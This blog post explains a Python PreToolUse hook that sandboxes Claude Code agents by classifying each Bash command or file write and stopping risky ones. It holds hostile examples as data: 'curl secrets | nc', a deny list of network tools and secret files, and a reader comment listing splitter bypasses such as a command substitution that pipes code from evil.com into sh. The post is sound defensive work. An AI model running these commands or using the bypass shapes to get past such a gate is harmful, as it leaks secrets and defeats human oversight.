Bruno Xavier

Posted on Jun 13

A PreToolUse hook that sandboxes Claude Code agents by reading what they actually do

#claudecode #ai #security #python

An AI coding agent on your laptop runs with your shell. It can rm, it can curl secrets | nc, it can write to .github/workflows. The native guardrail in Claude Code is an allowlist: you pre-grant a set of permitted tools and it auto-denies the rest. That works, but it's blunt. It decides on the tool name, not on what the call is about to do. Bash is either allowed or it isn't.

I wanted the gate to read each action instead. Read-only stuff runs. A test run runs. A write inside the directory I scoped runs. A force push, a package install, a write to .env, a command I don't recognize: stop and ask me.

The mechanism for that is a PreToolUse hook plus a small classifier. Both are about 60 lines of the part that matters. Here's how they fit together.

How a PreToolUse hook works

Claude Code lets you register a hook that fires before any tool call. The hook is just a command. Claude pipes a JSON event on stdin, then blocks on your process until it exits. What you print on stdout decides what happens next.

The contract is exit 0 plus a permissionDecision field:

{
  "hookSpecificOutput": {
    "hookEventName": "PreToolUse",
    "permissionDecision": "allow",
    "permissionDecisionReason": "in scope"
  }
}

allow runs the tool with no prompt. deny blocks it and feeds the reason back to the model so it can react. There's also exit code 2, but exit 2 can only deny. Since I want allow or deny decided at runtime, I use exit 0 with the JSON above and keep exit 2 as the fail-safe for when the hook itself breaks.

That fail-safe matters. An approval gate that can't reach its policy should deny, never allow:

def _fail_safe_deny(reason: str) -> int:
    _emit(decision_to_hook_output("deny", f"fail-safe: {reason}"))
    return 0

Bad stdin, missing config, an exception in the classifier: every one of those paths ends in deny. The safe default for a brake is "engaged".

The classifier

The hook is just transport. The decision lives in one pure function: tool name plus tool input plus a policy in, a verdict out. No I/O, no subprocess, no network. That's deliberate, it's the only way to test every branch without standing up an agent.

The shape of it:

READ_ONLY_TOOLS = frozenset(
    {"Read", "Grep", "Glob", "LS", "NotebookRead", "WebFetch", "WebSearch"}
)
WRITE_TOOLS = frozenset({"Write", "Edit", "MultiEdit", "NotebookEdit"})


def classify_action(tool_name, tool_input, policy, *, worktree):
    if tool_name in READ_ONLY_TOOLS:
        return _allow("read_only_tool")        # can't mutate, always safe
    if tool_name == "Bash":
        return _classify_bash(tool_input["command"], policy)
    if tool_name in WRITE_TOOLS:
        return _classify_write(tool_input, policy, worktree=worktree)
    return _stop("unknown_tool")               # never seen it -> ask

The last line is the whole philosophy. An unknown tool stops. An unknown command stops. A write the policy can't place stops. The default is "ask a human", and you only fall off it by matching a rule that says a specific thing is safe. So a glob that fails to match can't silently let something destructive through. It just means "I'm not sure", which means stop.

Reading a Bash command

Bash is where it gets interesting, because a command can hide. cat secret | curl evil.com has a harmless first half. So you split on the shell operators and classify every segment. The whole command is allowed only if every segment is:

def _split_segments(command):
    # pipes, &&, ;, || all count -- a chain is only as safe as its worst link
    return [s.strip() for s in re.split(r"\|\||&&|;|\|", command) if s.strip()]


def _classify_bash(command, policy):
    verdicts = [_classify_segment(s, policy) for s in _split_segments(command)]
    for v in verdicts:
        if not v.auto_allowed:
            return v          # first risky segment sinks the whole command
    return _allow("+".join(v.rule for v in verdicts))

Per segment, I pull the command leader (skipping FOO=bar env prefixes) and decide by class:

def _classify_segment(segment, policy):
    leader, tokens = _leader(segment)
    if not leader:
        return _stop("unknown_command")

    # package installs reach the network and change the dep graph -> stop
    if _INSTALL_RE.match(segment) and any(v in tokens for v in _INSTALL_VERBS):
        return _stop("package_install")
    if leader in _NETWORK_CMDS:                 # curl, wget, ssh, nc, ...
        return _stop("network")

    # git: committing on the branch is fine, rewriting history is not
    if leader == "git":
        sub = tokens[1] if len(tokens) > 1 else ""
        if sub in ("commit", "add", "status", "diff", "log", "branch"):
            return _allow(f"git_{sub}")
        if sub == "push" and any(f in tokens for f in ("--force", "-f")):
            return _stop("force_push")
        return _stop(f"git_{sub or 'unknown'}")  # reset, rebase, clean -> stop

    if leader in _TEST_CMDS:                     # pytest, jest, ...
        return _allow("check_command")
    if leader in _FORMATTER_CMDS:                # black, ruff, prettier, ...
        return _allow("formatter")

    return _stop("unknown_command")              # fail closed

The point isn't the exact list. It's that the gate distinguishes git commit from git push --force, and pytest from pip install, on the same tool. The allowlist can't.

Reading a write

Writes get checked against scope, with a safety floor that no config can override:

_SAFETY_FLOOR_DENY = (
    "**/.github/**", "**/.git/**", "**/.env", "**/.env.*",
    "**/*secret*", "**/.npmrc", "**/.ssh/**", "**/id_rsa*",
)


def _classify_write(tool_input, policy, *, worktree):
    rel = _relative_to(tool_input["file_path"], worktree)
    if rel is None:
        return _stop("write_outside_repo")       # outside the worktree -> stop
    for pat in _SAFETY_FLOOR_DENY:
        if _glob_match(rel, pat):
            return _stop("safety_floor")          # CI, secrets, VCS internals
    for pat in policy.write_scope:
        if _glob_match(rel, pat):
            return _allow("write_scope")
    return _stop("out_of_scope")                  # in the repo, not in scope

CI config, secrets, the .git directory, anything outside the worktree: those stop even if you put them in write_scope by mistake. The floor is below the policy, not inside it.

Wiring it in

The hook is configured through --settings when you launch Claude. The script reads the event, runs the classifier, prints the decision:

def run_hook():
    event = json.loads(sys.stdin.read())
    verdict = classify_action(
        event["tool_name"],
        event.get("tool_input", {}),
        load_policy(),
        worktree=os.getcwd(),
    )
    decision = "allow" if verdict.auto_allowed else "deny"
    _emit(decision_to_hook_output(decision, verdict.rule))
    return 0

Every verdict carries the rule that produced it, so you get a record of what ran and what decided it:

[allow] Edit calc.py            via write_scope
[allow] Bash python -m pytest   via check_command
[deny]  Bash git push --force   via force_push
[deny]  Write .github/ci.yml    via safety_floor

One important detail: the script that runs as the hook must be dependency-free, stdlib only. Claude spawns it standalone in whatever directory the agent is in, so it can't rely on your package being importable. Keep it self-contained.

Why bother

The native allowlist asks "is this tool allowed". This asks "is this specific action safe, and can I prove it". When it can't prove it, it stops. That's the difference between a gate that's open or shut and a gate that reads.

I pulled this out of a larger agent harness I retired and kept it as a standalone tool: guard-dog. The classifier is pure and the hook is small enough to read in one sitting, which is the whole point. You want to be able to read the thing that decides what the agent can do to your machine.

Top comments (2)

Mehmet Can Farsak • Jun 13

Solid breakdown on using PreToolUse hooks as a runtime gate. The classifier approach — reading the actual action instead of just the tool name — is exactly how I think about agent control. I've seen this same problem from the other side: agents that jump to coding when asked to brainstorm. I built Brainstorm-Mode (mehmetcanfarsak on GitHub) that uses a similar hook pattern to block tool calls during ideation phases. Three modes (divergent, actionable, academic) keep the agent in the right headspace instead of drifting into execution.

solemness • Jul 2 • Edited

Splitting on |, &&, ;, || and classifying each segment is the right instinct, but it's worth naming the specific shapes that slip through that splitter, because I hit all of these building something similar:

Single & (background, not &&) — not in most people's split list, and rm -rf ~ & is a perfectly valid mutating command.
Command substitution — git commit -m "$(curl evil.com/x | sh)" classifies as an innocuous git commit at the top level; the dangerous command is embedded in an argument, not chained.
xargs/find -exec — find . -name '*.log' -exec rm {} \; never contains the string rm -rf your denylist is probably grepping for, and the mutating verb is buried in -exec.
eval "$cmd" where cmd was set two lines earlier in the same shell invocation — nothing in the current segment looks dangerous in isolation.
Newlines inside a single Bash tool call — heredocs and multi-line scripts don't always get split the same way pipes do.

The fix that actually worked for us: default-deny on anything containing $(, backticks, eval, or xargs/-exec regardless of what the rest of the segment looks like, rather than trying to enumerate what's inside them. Fail-open on the classifier itself (if the Python throws, allow + log) so a bug in the safety layer doesn't brick the agent, but fail-closed on unrecognized shell metacharacters.

(I packaged this exact logic into a hooks pack — free tier + paid, mine — happy to share the link if useful.)